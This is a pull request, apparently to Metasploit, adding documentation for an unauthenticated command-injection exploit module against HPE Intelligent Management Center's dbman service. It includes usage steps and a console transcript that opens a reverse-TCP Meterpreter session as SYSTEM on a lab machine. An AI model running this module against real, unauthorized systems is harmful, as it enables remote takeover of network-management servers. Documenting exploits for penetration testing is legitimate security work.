### PR TITLE
Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit

### DIFF
--- a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md
+++ b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md
@@ -1,0 +1,59 @@
+## Description
+
+  This module exploits a remote command execution vulnerablity in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04.
+
+  The dbman service allows unauthenticated remote users to restore a user-specified database (OpCode 10007), however the database connection username is not sanitized resulting in command injection, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 2810 by default.
+
+
+## Vulnerable Application
+
+  [HPE Intelligent Management Center Enterprise Software Platform](https://www.hpe.com/au/en/product-catalog/networking/intelligent-management-software/pip.hp-intelligent-management-center-enterprise-software-platform.4176520.html) is a comprehensive wired and wireless network management tool.
+
+  This module has been tested successfully on:
+
+  * iMC PLAT v7.2 (E0403) on Windows 7 SP1 (EN).
+
+  Installer:
+
+  * [iMC PLAT v7.2 (E0403) Standard](https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce`
+  3. Do: `set RHOST <IP>`
+  4. Do: `run`
+  5. You should get a session
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce 
+  msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > set verbose true
+  verbose => true
+  msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > check
+  [*] 172.16.191.166:2810 The target service is running, but could not be validated.
+  msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > run
+
+  [*] Started reverse TCP handler on 172.16.191.238:4444 
+  [*] 172.16.191.166:2810 - Powershell command length: 6123
+  [*] 172.16.191.166:2810 - Sending payload (6123 bytes)...
+  [*] Sending stage (179779 bytes) to 172.16.191.166
+  [*] Meterpreter session 1 opened (172.16.191.238:4444 -> 172.16.191.166:49176) at 2018-01-05 05:30:48 -0500
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  smeterpreter > sysinfo 
+  Computer        : WIN-SGBSD5TQUTQ
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 1
+  Meterpreter     : x86/windows
+  ```
+


### PR DESCRIPTION
Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit

        This module exploits a remote command execution vulnerablity in
        Hewlett Packard Enterprise Intelligent Management Center before
        version 7.3 E0504P04.

        The dbman service allows unauthenticated remote users to restore
        a user-specified database (OpCode 10007), however the database
        connection username is not sanitized resulting in command injection,
        allowing execution of arbitrary operating system commands as SYSTEM.
        This service listens on TCP port 2810 by default.

        This module has been tested successfully on iMC PLAT v7.2 (E0403)
        on Windows 7 SP1 (EN).


## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce `
- [x] `set RHOST <IP>`
- [x] `run`
- [x] **Verify** you get a session


## Example Output

```
msf > use exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce 
msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > set verbose true
verbose => true
msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > check
[*] 172.16.191.166:2810 The target service is running, but could not be validated.
msf exploit(windows/misc/hp_imc_dbman_restoredbase_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.191.238:4444 
[*] 172.16.191.166:2810 - Powershell command length: 6123
[*] 172.16.191.166:2810 - Sending payload (6123 bytes)...
[*] Sending stage (179779 bytes) to 172.16.191.166
[*] Meterpreter session 1 opened (172.16.191.238:4444 -> 172.16.191.166:49176) at 2018-01-05 05:30:48 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
smeterpreter > sysinfo 
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```